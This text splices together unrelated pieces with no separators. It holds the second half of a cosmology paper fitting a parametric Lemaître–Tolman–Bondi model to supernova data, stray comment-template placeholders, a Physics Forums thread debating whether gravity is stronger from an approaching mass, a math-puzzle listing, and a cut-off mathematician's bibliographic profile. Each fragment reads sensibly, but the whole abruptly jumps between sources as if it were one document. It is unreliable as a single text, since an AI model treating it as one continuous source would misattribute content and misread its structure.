We choose the form of the free function $M(r)$ as following: $$\label{condif} M(r)=\mathcal{M}_g N(r)= \mathcal{M}_g \sigma r^{d},$$ where $\mathcal{M}_g$ is the mass of a galaxy. This choice is our prescription to restrain the free function of the LTB models. $(\sigma, d)$ are two free parameters which will constrained by supernovae data. In section 5., a connection to fractal cosmologies will be described.
Observational distance
We will follow Ref. [22] for the definition of distances, more information and references can be found in that piece of work. Ellis [23] gave a definition of the angular distance which applied to the LTB metric gives $d_A=R$, one applies furthermore Etherington reciprocity theorem [24]: $$\label{Th} d_L=(1+z)^2 d_A,$$ which is true for general spacetime provided that source and observer are connected through null geodesics. Since, one considers a small class of parametric LTB model, an analytic solution of (\ref{EOM}) can be found: $$\label{solu} R(r,t)= \left(\frac{9M(r)}{2}\right)^{1/3} (t_B+t)^{2/3}.$$ Assuming a single radial geodesic [12], an analytical expression for the redshift as a function of the radial coordinate has been found in Ref. [22]: $$\label{SNR} 1+z(r) = \frac{t_B^{2/3}}{(t_B+t)^{2/3}}=\frac{t_B^{2/3}}{(t_B-r)^{2/3}}.$$ Using Eqs. (\ref{condif})(\ref{Th})(\ref{solu})(\ref{SNR}), it is possible to propose an expression for the parametric LTB luminosity distance: $$\label{eq:dl} d_L=\left(\frac{9\sigma M_g}{2}\right)^{1/3} t_B^{\frac{d+2}{3}} \frac{\left((1+z)^{3/2}-1\right)^{d/3}}{(1+z)^{d/2-1}}.$$ This will be the formula we will confront to its FLRW counterpart, it is only a function of the two parameters characterizing the matter distribution ($\sigma$,$d$). We will work with the following units: the unit of mass is $2.09\times 10^{22} M_{\odot}$, the time unit is $3.26\times 10^9$ years and the distances are given in Gpc. The big-bang time will be taken for the data analysis to be equal to 4.3.
Supernovae data analysis
In this section, we will fit the Union2.1 compilation released by the Supernova Cosmology Project [14]. It is composed of 580 uniformly analyzed SNe IA and is currently the largest and most recent public available sample of standardized SNe IA. The redshifts range is up to $z=1.5$
parameter 1 parameter 2 $\chi^2$ flat FLRW $\Omega_M=0.30\pm 0.03$ $h=0.704 \pm 0.006$ $538$ parametric LTB $d=3.44 \pm 0.03$ $\sigma^{1/3}=0.192 \pm 0.002$ $973$
\flushleft A $\chi^2$ fit has been performed, it consists in minimizing the $\chi^2$ defined as: $$\chi^2(\text{parameter 1},\text{parameter 2}) \equiv \sum_{i=1}^{580} \left[ \frac{d_L(i)-d_L(\text{parameter 1},\text{parameter 2})}{\Delta d_L(i)} \right]^2$$ where $\Delta d_L(i)$ is the observational error bar for each data point indexed by $i$. The results are presented in the table together with the 95% confidence interval
Figure 1 Figure 1. Best fitting line for the FLRW model (red, upper curve) and the parametric LTB (orange, lower curve), the quantitative results are given in the table.
Figure 2 Figure 2. Residuals errors for the FLRW model
Figure 3 Figure 3. Residuals errors for the parametric LTB model
1, 3, 5 $\sigma$ confidence limits for the parametric LTB model.
$\Omega_M$ and $h$ are the two free parameters of the flat FLRW model. Recall that $\Omega_{\Lambda}$ is related to $\Omega_M$ with the relation $\Omega_{\Lambda}+\Omega_M=1$ ; h is related to the Hubble constant via $H_0 \equiv 100 h \frac{\text{km}}{\text{Mpc s}}$. The Hubble diagram and the associated residuals are plotted in Fig. 1. Our results for the FLRW case are in agreement with the current literature on the cosmological parameters [1] although the uncertainties are bigger. Interestingly the parametric LTB models gives results with are not compatible with a FLRW in the sense that to recover the FLRW model, $d$ has to be exactly 3. Looking at the confidence interval ellipses displayed in Fig. (4) the value $d=3$ is ruled out by more than $5\sigma$. This illustrates that eventhough, the data are not better fitted by the parametric LTB model, it still does better than an Einstein de Sitter one (which would be $\Omega_M=1$).
The shape of the SNe IA is empirically well understood but their absolute magnitude is unknown and need to be calibrated. One need either to analytically marginalize the assumed Hubble rate (or equivalently the absolute magnitude of the supernovae) [25], appendix C.2 of Ref. [26], or to use a weight matrix formalism (cf. Ref. [27]). Moreover, several authors pointed out the fact that the supernovae sample reduced with the SALT-II light-curve fitter from Ref. [28] are systematically biased toward the standard cosmological model and are showing a tendency to disfavor alternative cosmologies [2931]. This might be an reason why the parametric LTB model fit has a bigger $\chi^2$.
A connection to fractal cosmologies
In this section, we will first review the use of fractal and explain how our model could be related to fractal matter distribution. The idea of fractals relies on spatial power law scaling, self-similarity and structure recursiveness.[32] These features are present in the formula: $$N(r) \sim r^d,$$ where $d$ is the fractal dimension, r the scale measure and N(r) the distribution which manifests a fractal behavior. If $d$ is an integer, it can be associated to the usual distribution (point-like for d=0, a line for d=1 and so on). The further from the spatial dimension, the more the fractal structure is "broken" or irregular. Note that topological arguments requires the fractal dimension to be smaller than the spatial dimension in which the fractal in embedded. This features of irregularity were useful to describe various structures from coastlines shapes to structure of clouds. In the context of cosmology, a fractal distribution would simply describe how clumpy, inhomogeneous our Universe is. Historically, this idea was popular in the late 80's,[3335] then some more modern models were developed [3638] and the relation to cosmological observation was also was worked out (see Refs. [3941] and references therein for an analysis with galaxy distribution).
Using LTB models together with a fractal matter distribution has been already considered in Refs. [4247]. In Ref. [22], following Ref. [33], the authors proposed a fractal inspired model by taking the luminosity distance as the spatial separation of the fractal ($N(r)=\sigma (d_L)^d$). This is motivated by the view of the fractal structure as an observational feature of the galaxy distribution. Since astronomical observation are carried out on the past null cone, the underlying structure of galaxy may not be itself fractal.[42,43]. The model proposed by Ref. [22] (and Ref. therein) is interesting but a clear problem appears, if one uses the self-similarity condition for the LTB model (Eq. (3.17)), it is clear that, at $z=0$, the mass function is not zero which is unsatisfactory (cf. also Fig. 3.5). In the same way, it can be shown that within the framework of Ref. [22], the luminosity distance is non zero at $z=0$, again this shows that this model cannot describe our Universe at low redshift.
The model we considered in the previous sections is such that $N(r)=\sigma r^d$ and could correspond to a fractal matter distribution if $0<d<3$ from topological considerations. The fractal is described by the coordinate $r$, that is the fractal structure is a geometrical effect which does not necessarily translate itself in an astronomically observable quantity. Contemplating the best fit of $d=3.44$ and within our working hypothesis, we can state that supernovae IA data do not support fractal models.
Conclusion and Perspectives
A parametric LTB model has been introduced in this work. It is characterized by two parameters ($\sigma$,$d$) like the flat FLRW model ($H_0$,$\Omega_M$). The link to SNIa data was then worked out leading to a comparison between the flat FLRW model and the parametric LTB model. The parametric LTB model can fit the data reasonably but the standard FLRW fit the data better. To keep testing such models, it is desirable to improve the data analysis with more elaborate techniques for SNe IA but also with others data sets eg. CMB anisotropies and polarization, Integrated Sachs Wolfe effect, light element abundances, baryon acoustic oscillation, Galaxies Surveys... One of the motivation to build such a model was to propose a physical input to constrain the general LTB where the two free functions that this model enjoys allow to fit any cosmological data under mild assumption on these free functions [12]. The parametric LTB model of this paper can be generalized to cases where $t_B(r)$ is not constant or (but not and because of the gauge freedom of the free functions of the LTB metric) by considering non uniformly flat geometries. It has been shown for instance in Ref. [48] that a nonsimultaneous big-bang can also account for the acceleration of the expansion of the Universe.
Since FLRW models are nowadays the most popular ones, many caveats of them are known and investigated with special care (cf. Sec. 2.). Even though, the LTB metric is less popular, some problems have also been identified and investigated. To account for the remarkable uniformity of the CMB observation, our location in the Universe has to be fine-tuned at (or close up to 1% to) the symmetry center of the LTB model [26] clearly violating the Copernican principle. Whether this fine-tuning is problematic is still debated nowadays:[11,49] for instance the FLRW model is also non-copernican from a fully-relativistic point of view. Another direction would be not to take LTB models too literally.[11,13] As for the FLRW, LTB models should be considered as a an approximation of the reality. In some average sense, it could be that an inhomogeneous metric captures the real world better than a perfectly symmetric one.[50] Other exact non spherically symmetric solutions exist, like the Szekeres model,[51,52] examples patching together FLRW and LTB metrics in a kind of Swiss cheese model,[53] patching Kasner and FLRW models,[19] meatball models.[54] Thus those models should not be taken as way to describe exactly our reality but as attempt to investigate inhomogeneous metric and see how much of our reality it grasps. Most of those extensions are in agreement with the Copernican principle.
When it comes to discuss structure formation in the FLRW model, one still assumes spatial homogeneity and isotropy but considers the forming structures as metric and matter perturbations. Performing the perturbation theory in a LTB metric is a really complex task, especially because a scalar-vector-tensor decomposition does not allow anymore to study separately the scalar, vector and tensor modes. Instead the "natural" variables to perform the perturbation theory give in the FLRW limit a cumberstone combination of scalars vectors and tensors. Efforts were done in this direction [55,56] but the perturbation techniques are not yet advanced enough to be challenged with realistic numerical simulations and observations as the FLRW model. In addition, the observation indicates the Universe to be very flat which created a fine-tuning problem christened the flatness problem. The solution for the FLRW universe was a period of inflation. Aiming at describing the early Universe with a LTB model, the same flatness problem might appear. However inflation would then occur differently in separate space location. This is a bizarre feature on which one can only speculates the consequences. It might be one different way to touch the multiverse scenario [57]. With a loss of generality for the free functions, it is always possible to demand the LTB model to approach the homogeneous limit in the early times, in which case the inflationary FLRW results apply [58].
To finish, all the models involving inhomogeneities do not solve the cosmological constant problem [21] but just shift it. From explaining a fairly unnatural value for it, one just assumes it is zero without providing any explanation. This is in complete disagreement with Loverlock theorem which states the cosmological constant appears naturally in any metric theory of gravity [59,60]. All the models of dynamical dark energy suffer from the same criticism.
Acknowledgments
The author expresses his gratitude to Vera Podskalsky for hosting him during the crucial part of this work. Disha Sawant, Gregory Vereshchagin and Remo Ruffini are also acknowledged for discussions. CS is supported by the Erasmus Mundus Joint Doctorate Program by Grant Number 2013-1471 from the EACEA of the European Commission.
References
1. P. A. R. Ade et al. [Planck Collaboration], Astron. Astrophys. 571 (2014) A16 [arXiv:1303.5076 [astro-ph.CO]].
2. R. Maartens, Phil. Trans. Roy. Soc. Lond. A 369 (2011) 5115 [arXiv:1104.1300 [astro-ph.CO]].
3. C. Clarkson, Comptes Rendus Physique 13 (2012) 682 [arXiv:1204.5505 [astro-ph.CO]].
4. G. F. R. Ellis, astro-ph/0602280.
5. G. Lemaitre, Annales Soc. Sci. Brux. Ser. I Sci. Math. Astron. Phys. A47, 49 (1927).
6. R. C.Tolman, Proc. Nat. Acad. Sci. 20, 169 (1934).
7. H. Bondi, Mon. Not. Roy. Astron. Soc. 107, 410 (1947).
8. M. N. Celerier, Astron. Astrophys. 353 (2000) 63 [astro-ph/9907206].
9. H. Iguchi, T. Nakamura and K. i. Nakao, Prog. Theor. Phys. 108 (2002) 809 [astro-ph/0112419].
10. S. Nadathur, S. Sarkar, Phys. Rev. D 83 (2011) 063506,
11. M. N. Celerier, Astron. Astrophys. 543 (2012) A71 [arXiv:1108.1373 [astro-ph.CO]].
12. N. Mustapha, C. Hellaby and G. F. R. Ellis, Mon. Not. Roy. Astron. Soc. 292 (1997) 817 [gr-qc/9808079].
13. M. N. Celerier, K. Bolejko and A. Krasinski, Astron. Astrophys. 518 (2010) A21 [arXiv:0906.0905 [astro-ph.CO]].
14. N. Suzuki et al., Astrophys. J. 746 (2012) 85 [arXiv:1105.3470 [astro-ph.CO]].
15. L. G. Balazs, Z. Bagoly, J. E. Hakkila, I. Horvath, J. Kobori, I. Racz and L. V. Toth, arXiv:1507.00675 [astro-ph.CO].
16. M. F.Shirokov and I. Z. Fisher, Soviet Ast. 6, 699 (1963).
17. T. Buchert, Gen. Rel. Grav. 32 (2000) 105 [gr-qc/9906015].
18. R. Zalaletdinov, Int. J. Mod. Phys. A 23 (2008) 1173 [arXiv:0801.3256 [gr-qc]].
19. P. Fleury, H. Dupuy and J. P. Uzan, Phys. Rev. D 87 (2013) 12, 123526 [arXiv:1302.5308 [astro-ph.CO]].
20. E. W. Kolb and M. S.Turner, The Early Universe (Addison-Wesley,1990), frontiers in Physics, 69.
21. J. Martin, Comptes Rendus Physique 13 (2012) 566 [arXiv:1205.3365 [astro-ph.CO]].
22. F. A. M. G. Nogueira, arXiv:1312.5005 [gr-qc].
23. G. Ellis, Gen.Rel.Grav. 41, 581 (1971).
24. I. M. H.Etherington, Phil.Mag. 15, 761 (1933).
25. S. L. Bridle, R. Crittenden, A. Melchiorri, M. P. Hobson, R. Kneissl and A. N. Lasenby, Mon. Not. Roy. Astron. Soc. 335 (2002) 1193 [astro-ph/0112114].
26. T. Biswas, A. Notari and W. Valkenburg, JCAP 1011 (2010) 030 [arXiv:1007.3065 [astro-ph.CO]].
27. R. Amanullah et al., Astrophys. J. 716 (2010) 712 [arXiv:1004.1711 [astro-ph.CO]].
28. J. Guy et al. [SNLS Collaboration], Astron. Astrophys. 466 (2007) 11 [astro-ph/0701828 [ASTRO-PH]].
29. M. Hicken, W. M. Wood-Vasey, S. Blondin, P. Challis, S. Jha, P. L. Kelly, A. Rest and R. P. Kirshner, Astrophys. J. 700 (2009) 1097 [arXiv:0901.4804 [astro-ph.CO]].
30. R. Kessler et al., Astrophys. J. Suppl. 185 (2009) 32 [arXiv:0908.4274 [astro-ph.CO]].
31. P. R. Smale and D. L. Wiltshire, Mon. Not. Roy. Astron. Soc. 413 (2011) 367 [arXiv:1009.5855 [astro-ph.CO]].
32. B. B.Mandelbrot, The Fractal Geometry of Nature (1982).
33. L. Pietronero, Physica Rev. A 144 (1987).
34. P. H.Coleman and L. Pietronero, Phys. Rept. 213, {311}(1992).
35. R. Ruffini, D. Song, and S. Taraglio, Astron.Astrophys. 190 (1988).
36. J. R. Mureika, JCAP 0705,021 (2007), gr-qc/0609001.
37. Y. V. Baryshev, 'Practical Cosmology', v.2, pp.60-67, 2008 [arXiv:0810.0162 [gr-qc]].
38. P. V. Grujic and V. D. Pankovic, arXiv:0907.2127 [physics.gen-ph].
39. C. A. Chacon-Cardona and R. A. Casas-Miranda, Mon. Not. Roy. Astron. Soc. 427 (2012) 2613 [arXiv:1209.2637 [astro-ph.CO]].
40. G. Conde-Saavedra, A. Iribarrem and M. B. Ribeiro, Physica A 417 (2015) 332 [arXiv:1409.5409 [astro-ph.CO]].
41. J. S. Bagla, J. Yadav and T. R. Seshadri, Mon. Not. Roy. Astron. Soc. 390 (2007) 829 [arXiv:0712.2905 [astro-ph]].
42. M. B. Ribeiro, Astrophys. J. 388 (1992) 1 [arXiv:0807.0866 [astro-ph]].
43. M. B. Ribeiro, Astrophys. J. 395 (1992) 29 [arXiv:0807.0869 [astro-ph]].
44. M. B. Ribeiro, Astrophys. J. 415 (1993) 469 [arXiv:0807.1021 [astro-ph]].
45. F. Sylos Labini, M. Montuori and L. Pietronero, Phys. Rept. 293 (1998) 61 [astro-ph/9711073].
46. F. S. Labini, Europhys. Lett. 96 (2011) 59001 [arXiv:1110.4041 [astro-ph.CO]].
47. F. S. Labini, Class. Quant. Grav. 28 (2011) 164003 [arXiv:1103.5974 [astro-ph.CO]].
48. A. Krasiński, Phys. Rev. D 89, 023520 (2014).
49. P. Sundell and I. Vilja, Mod. Phys. Lett. A 29 (2014) 10, 1450053 [arXiv:1311.7290 [astro-ph.CO]].
50. K. Bolejko and R. A. Sussman, Phys. Lett. B 697 (2011) 265 [arXiv:1008.3420 [astro-ph.CO]].
51. P. Szekeres, Commun.Math.Phys. 41 (19 75) 55.
52. K. Bolejko and M. N. Celerier, Phys. Rev. D 82 (2010) 103510 [arXiv:1005.2584 [astro-ph.CO]].
53. T. Biswas and A. Notari, JCAP 0806 (2008) 021 [astro-ph/0702555].
54. K. Kainulainen and V. Marra, Phys. Rev. D 80 (2009) 127301 [arXiv:0906.3871 [astro-ph.CO]].
55. C. Clarkson, T. Clifton and S. February, JCAP 0906 (2009) 025 [arXiv:0903.5040 [astro-ph.CO]].
56. A. Leithes and K. A. Malik, Class. Quant. Grav. 32 (2015) 1, 015010 [arXiv:1403.7661 [astro-ph.CO]].
57. B. Carr, ed., Universe or Multiverse? (Cambridge University Press, 2007), ISBN 9781107050990.
58. R. de Putter, L. Verde and R. Jimenez, JCAP 1302 (2013) 047 [arXiv:1208.4534 [astro-ph.CO]].
59. D. Lovelock, J. Math. Phys. 12, 498 (1971).
60. D. Lovelock, J. Math. Phys. 13, 874 (1972).
Footnotes
1. clement.stahl@icranet.org
Filters:
{{childPeer.user.name}}
{{getCommentDate(childPeer.date) | amDateFormat:'MMM Do YYYY, HH:mm'}}
{{childPeer.user.name}}
{{getCommentDate(childPeer.date) | amDateFormat:'MMM Do YYYY, HH:mm'}} |
"Doppler" Gravity
• I
Homework Helper
Main Question or Discussion Point
When a force follows the inverse square law, its effects are stronger as the source approaches than when it recedes.
So light will blue shift (higher energy) and sound is louder and at a higher pitch.
So I would think that gravity would be stronger from an approaching object that from a receding one.
This effect would be important for objects travelling at relativistic velocities and would be in addition to the relativistic increase in mass.
But I haven't seen this mentioned in any articles.
Does this effect exist? If not, why not?
Related Special and General Relativity News on Phys.org
Nugatory
Mentor
Does this effect exist? If not, why not?
Doppler has nothing to do with whether a phenomenon is governed by an inverse square law or not. Machine gun bullets aren't subject to any inverse square law (in vacuum their momentum and kinetic energy is constant throughout their flight) but do demonstrate the Doppler effect: If you are flying head-on towards the gun you will be hit by more bullets per unit time than if you are flying away from it.
Homework Helper
OK. But my question is whether gravity is more intense from an approaching object than from a receding one.
I put "Doppler" in quotes because Doppler is specific to a frequency shift. In this case, there is no oscillation involved - but there should still be an increase or decrease in intensity.
Actually, the machine gun example further suggests that this effect would apply broadly - perhaps including to gravity.
Last edited:
PeterDonis
Mentor
2019 Award
So I would think that gravity would be stronger from an approaching object that from a receding one.
Why? Gravity is not EM radiation.
Also, what do you mean by "gravity would be stronger"? I strongly suggest looking at the math rather than trying to use intuition.
PeterDonis
Mentor
2019 Award
This effect would be important for objects travelling at relativistic velocities and would be in addition to the relativistic increase in mass.
The source of gravity is not relativistic mass. It's the stress-energy tensor.
Grinkle
Gold Member
I would think that gravity would be stronger from an approaching object that from a receding one.
Waves from an approaching source are not higher in amplitude, they are shifted in frequency.
Gravity waves (which is not what you are talking about, I don't think) don't appear as far as I know just because a massive object is moving through spacetime, they need something exotic like a massive orbiting di-pole. If such a di-pole were approaching a gravity wave detector, I think the waves might have a shifted frequency but not an increased or decreased amplitude vs waves that would be generated from a di-pole not moving with respect to the detector. I am very unqualifed to make that statement - its just supposition on my part.
A massive object moving towards a gravity wave detector won't generate any gravity waves. You aren't talking about gravity waves per se, but your question did make me think some about that aspect.
PAllen
2019 Award
Waves from an approaching source are not higher in amplitude, they are shifted in frequency.
Gravity waves (which is not what you are talking about, I don't think) don't appear as far as I know just because a massive object is moving through spacetime, they need something exotic like a massive orbiting di-pole. If such a di-pole were approaching a gravity wave detector, I think the waves might have a shifted frequency but not an increased or decreased amplitude vs waves that would be generated from a di-pole not moving with respect to the detector. I am very unqualifed to make that statement - its just supposition on my part.
A massive object moving towards a gravity wave detector won't generate any gravity waves. You aren't talking about gravity waves per se, but your question did make me think some about that aspect.
Actually, for gravitational waves, dipole oscillation is not enough. You need nonzero second derivative of the quadrupole moment.
Homework Helper
Okay, here's some math:
We start with an observer at location 0 and a massive object (A) travelling along the line from $-\infty$ to $+\infty$ at $c/2$.
I will assume (please indicate your agreement or objection) that the total change in momentum applied to the observer from the gravitational force of A will be the same as A moves from -4 Km to -3 ($p_{(-4,-3)}$) as when it moves from 3 Km to 4 ($p_{(3,4)}$).
However, from the observer's perspective:
- A reaches -4Km, -3, 3, and 4 at times -8Km/c, -6Km/c, 6Km/c and 8Km/c respectively.
- Gravity from A at -4Km, -3, 3, and 4 reaches the observer at -4Km/c, -3Km/c, 9Km/c and 12Km/c respectively.
So the momentum imparted to the observer from $p_{(-4,-3)}$ occurs over time 1Km/c while that from $p_{(3,4)}$ occurs over 3Km/c.
If my assumption is not correct, then consider the following scenario:
- observers are at -6Km and 6.
- object A materializes at -1Km, travels at $c/2$ and vanishes at +1
- would both observers have the same change in momentum?
Homework Helper
The source of gravity is not relativistic mass. It's the stress-energy tensor.
OK. I will look that up.
Grinkle
Gold Member
We start with an observer at location 0 and a massive object (A) travelling along the line from −∞-\infty to +∞+\infty at c/2c/2.
I think this is saying that your observer is falling into the gravity well of the massive object.
- observers are at -6Km and 6.
- object A materializes at -1Km, travels at c/2c/2 and vanishes at +1
- would both observers have the same change in momentum?
I may be missing your point, but when I think about this it just seems like objects moving into or out of gravity wells, not gravity being stronger or weaker?
jbriggs444
Homework Helper
2019 Award
- object A materializes at -1Km, travels at c/2c/2c/2 and vanishes at +1
Cannot be done. Local energy conservation is a property of general relativity. You cannot materialize or dematerialize objects.
Homework Helper
I think this is saying that your observer is falling into the gravity well of the massive object.
I may be missing your point, but when I think about this it just seems like objects moving into or out of gravity wells, not gravity being stronger or weaker?
My point is that either the effect of gravity (the observers change in momentum) is different based on whether the massive object is approaching or receding. The difference is either:
- the total change in momentum;
- the rate of change (G force); or
- both
Homework Helper
Cannot be done. Local energy conservation is a property of general relativity. You cannot materialize or dematerialize objects.
That is certainly true. But I can slice up time/space into time-like pieces and consider the changes that occur in each slice.
jbriggs444
Homework Helper
2019 Award
That is certainly true. But I can slice up time/space into time-like pieces and consider the changes that occur in each slice.
No, you cannot. Because once you've sliced off a chunk of time there can be no change because there is no elapsed time. In any case, that does not let you materialize or dematerialize objects.
Homework Helper
No, you cannot. Because once you've sliced off a chunk of time there can be no change because there is no elapsed time. In any case, that does not let you materialize or dematerialize objects.
The slice is not zero seconds in length. It is simply from one moment to another moment a few Km/c later.
If you don't like materializing and dematerializing objects, just use those moments at the start and end of the data collection period.
jbriggs444
Homework Helper
2019 Award
The slice is not zero seconds in length. It is simply from one moment to another moment a few Km/c later.
If you don't like materializing and dematerializing objects, just use those moments at the start and end of the data collection period.
So now that we have permanently gravitating objects, what is the scenario that you are testing?
Nugatory
Mentor
We start with an observer at location 0 and a massive object (A) travelling along the line from $-\infty$ to $+\infty$ at $c/2$.
I will assume (please indicate your agreement or objection) that the total change in momentum applied to the observer from the gravitational force of A will be the same as A moves from -4 Km to -3 ($p_{(-4,-3)}$) as when it moves from 3 Km to 4 ($p_{(3,4)}$).
However, from the observer's perspective:
- A reaches -4Km, -3, 3, and 4 at times -8Km/c, -6Km/c, 6Km/c and 8Km/c respectively.
- Gravity from A at -4Km, -3, 3, and 4 reaches the observer at -4Km/c, -3Km/c, 9Km/c and 12Km/c respectively.
So the momentum imparted to the observer from $p_{(-4,-3)}$ occurs over time 1Km/c while that from $p_{(3,4)}$ occurs over 3Km/c.
I'm not sure what you mean by "gravity from A .... reaching the observer". Nothing is moving from the gravitational source to the observer, so there's nothing to reach anywhere. However, there's a deeper problem here: How exactly are you defining these points that you're labeling -4km, -3km, 3km, 4km and those times you're labeling -4km/c, -3km/c, 3km/c, 4km/c? Those are coordinates. How are they related to points in spacetime? And how are you comparing the coordinate-dependent three-momenta of the observer at the start and end of the two paths? The distances between 3km and 4km and between -3km and -4km are not 1km, they are "it depends", and not necessarily the same.
I expect that you are implicitly assuming a global inertial frame in which A starts at rest at (0,0), because only then do the answers to these questions appear obvious, and only then would it seem that there is a natural way that any sensible person committed to answering your question instead of quibbling would interpret your description of the thought experiment. Unfortunately, in this thought experiment there can be no such frame - global inertial frames exist only in the absence of gravitational effects, and this problem is specifically about gravitational effects.
To reason about this situation properly, you could either try looking at the Aichelburg-Sexl ultraboost (basically, the Schwarzschild spacetime described using coordinates in which the the gravitating body is moving at relativistic speeds), or work with the equivalent situation: The gravitating body is at rest so you can use Schwarzschold or other more common coordinates, and the observer is approaching it with a non-zero coordinate velocity. The latter approach is better for building an intuitive picture of what's going on, and going through it will demonstrate just how tricky it is to describe the setup accurately.
You should end up with a gravitational slingshot effect like what we see in Newtonian physics when a spacecraft passes by a planet (and identical in the non-relativistic limit).
I withdraw this last sentence. There is a very large can of worms hiding behind it, and getting right would be a huge digression in this thread.
Last edited:
Homework Helper
So now that we have permanently gravitating objects, what is the scenario that you are testing?
There were a total of three scenarios, four if you count scenario/observer combinations. I described all well.
In all cases, the mass is moving over an interval directly towards or away from an observer - at a relative speed of c/2.
The results are changes in the momentum for the observers. But since the period of time that the observers are affected is different depending on whether the mass is approaching or receding. So either the total momentum is different in those cases or the rate of momentum change is different. I am still not sure which.
Nugatory
Mentor
o either the total momentum is different in those cases or the rate of momentum change is different. I am still not sure which.
Either or both. The three-momentum and its rate of change are both coordinate-dependent, so which it is depends on your choice of coordinates.
Homework Helper
I'm not sure what you mean by "gravity from A .... reaching the observer".
This is the ol' "If the sun disappear now, how long would it take for the Earth to leave orbit?".
Presumable, the effect of any such change will take 8 minutes.
Nothing is moving from the gravitational source to the observer, so there's nothing to reach anywhere.
Would it help if I postulated a mass of photons colliding with another mass and interacting to form object A and the specified velocity and position? Then decaying into two masses of photons and the end position?
However, there's a deeper problem here: How exactly are you defining these points that you're labeling -4km, -3km, 3km, 4km and those times you're labeling -4km/c, -3km/c, 3km/c, 4km/c? Those are coordinates. How are they related to points in spacetime?
There is only one space dimension in these scenarios. Nothing happens in the other two spacial dimensions (except thoses masses of photons I just introduce in this post. So the observer is at the 0Km position and all times are observer times.
And how are you comparing the coordinate-dependent three-momenta of the observer at the start and end of the two paths? The distances between 3km and 4km and between -3km and -4km are not 1km, they are "it depends", and not necessarily the same.
Everything is in the observer's frame. So the question I have about the differences is from the observer's frame.
I expect that you are implicitly assuming a global inertial frame in which A starts at rest at (0,0), because only then do the answers to these questions appear obvious, and only then would it seem that there is a natural way that any sensible person committed to answering your question instead of quibbling would interpret your description of the thought experiment. Unfortunately, in this thought experiment there can be no such frame - global inertial frames exist only in the absence of gravitational effects, and this problem is specifically about gravitational effects.
OK. But my question should still be addressable in terms of what the net effect would be.
To reason about this situation properly, you could either try looking at the Aichelburg-Sexl ultraboost (basically, the Schwarzschild spacetime described using coordinates in which the the gravitating body is moving at relativistic speeds), or work with the equivalent situation: The gravitating body is at rest so you can use Schwarzschold or other more common coordinates, and the observer is approaching it with a non-zero coordinate velocity. The latter approach is better for building an intuitive picture of what's going on, and going through it will demonstrate just how tricky it is to describe the setup accurately.
I will add that to "Tensors" to my homework list. So far, I haven't run into any "meat" in my Gravitational Tensor reading.
PeterDonis
Mentor
2019 Award
This is the ol' "If the sun disappear now, how long would it take for the Earth to leave orbit?".
Which, as has already been pointed out, is impossible because objects like the sun can't disappear; stress-energy is locally conserved.
It turns out to be highly non-trivial to formulate a consistent scenario to test "the speed of gravity". For an introduction to some of the issues involved, I suggest this classic paper by Carlip:
https://arxiv.org/abs/gr-qc/9909087
jbriggs444
Homework Helper
2019 Award
This is the ol' "If the sun disappear now, how long would it take for the Earth to leave orbit?".
Again, that is not a valid question. The sun cannot disappear.
Homework Helper
Either or both. The three-momentum and its rate of change are both coordinate-dependent, so which it is depends on your choice of coordinates.
OK...
Let me present a somewhat more complicated thought experiment - but one that is easier to describe, although probably much more complicated to address the reasoning:
Let's have a flat universe with many stationary (in their frame) gravitation sources (perhaps galaxies) evenly disbursed.
Now we will introduce another galaxy travelling through this universe at c/2.
Taking this galaxy as our frame, will this galaxy accelerate? If it does, it would be because there is a kind of "Doppler" (for lack of a better term) that is related to gravity's propagation rate. If it does not, then gravity is doing something that I don't understand. Somehow it isn't really propagating at the speed of light - because our moving galaxy isn't "running into" this propagation and causing it to "bunch up".
Nugatory
Mentor
Everything is in the observer's frame. So the question I have about the differences is from the observer's frame.
Well, that makes the problem easy.... The observer's momentum using that frame (which is not global) is initially zero and never changes.
But I expect that what you really meant was "a global inertial frame in which the observer is initially at rest", and there is no such thing. There is a local inertial frame in which the observer is initially at rest, but because it is local it cannot be used to assign times and positions to more distant points.
I will add that to "Tensors" to my homework list. So far, I haven't run into any "meat" in my Gravitational Tensor reading.
The first step (you'll find this towards the start of just about every GR textbook) is to see how ordinary flat-space special relativity works when written in tensor form. This allows you to clearly separate the coordinate artifacts from the actual coordinate-dependent physics, the stuff that we can measure and observe.
Homework Helper
Well, that makes the problem easy.... The observer's momentum using that frame (which is not global) is initially zero and never changes.
But I expect that what you really meant was "a global inertial frame in which the observer is initially at rest", and there is no such thing.
I didn't consider that problem. You're right. I was trying to use a more global frame. But I think the problem with such a global frame is small when compared to the 3:1 ratio in the exposure rate to the receding and approaching masses. |
mscroggs.co.uk
mscroggs.co.uk
subscribe
Puzzles
Is it equilateral?
In the diagram below, $$ABDC$$ is a square. Angles $$ACE$$ and $$BDE$$ are both 75°.
Is triangle $$ABE$$ equilateral? Why/why not?
17 December
The number of degrees in one internal angle of a regular polygon with 360 sides.
Ticking clock
Is there a time of day when the hands of an analogue clock (one with a second hand that moves every second instead of moving continuously) will all be 120° apart?
Tags: angles, time
Dodexagon
In the diagram, B, A, C, D, E, F, G, H, I, J, K and L are the vertices of a regular dodecagon and B, A, M, N, O and P are the vertices of a regular hexagon.
Show that A, M and E lie on a straight line.
Three squares
Source: Numberphile
The diagram shows three squares with diagonals drawn on and three angles labelled.
What is the value of $$\alpha+\beta+\gamma$$?
Archive
Show me a random puzzle
▼ show ▼ |
Compute Distance To:
Documents Indexed: 26 Publications since 1987 Reviewing Activity: 55 Reviews Co-Authors: 16 Co-Authors with 11 Joint Publications 366 Co-Co-Authors
all top 5
### Co-Authors
15 single-authored 4 Simonenko, Igor’ Borisovich 3 Batalshchikov, A. A. 3 Deundyak, Vladimir Mikhaĭlovich 3 Grudsky, Sergei Mikhailovich 2 Ramírez de Arellano, Enrique 2 Zolotykh, Svetlana Andreevna 1 Abanin, Aleksandr Vasil’evich 1 Karyakin, Mikhail I. 1 Klimentov, Sergeĭ Borisovich 1 Korobeĭnik, Yuriĭ Fëdorovich 1 Kusraev, Anatoly Georgievich 1 Levendorskiĭ, Sergeĭ Zakharovich 1 Malisheva, I. S. 1 Mihalkovich, S. S. 1 Soibelman, Yan S. 1 Vatulyan, Aleksandr Ovanesovich
all top 5
### Serials
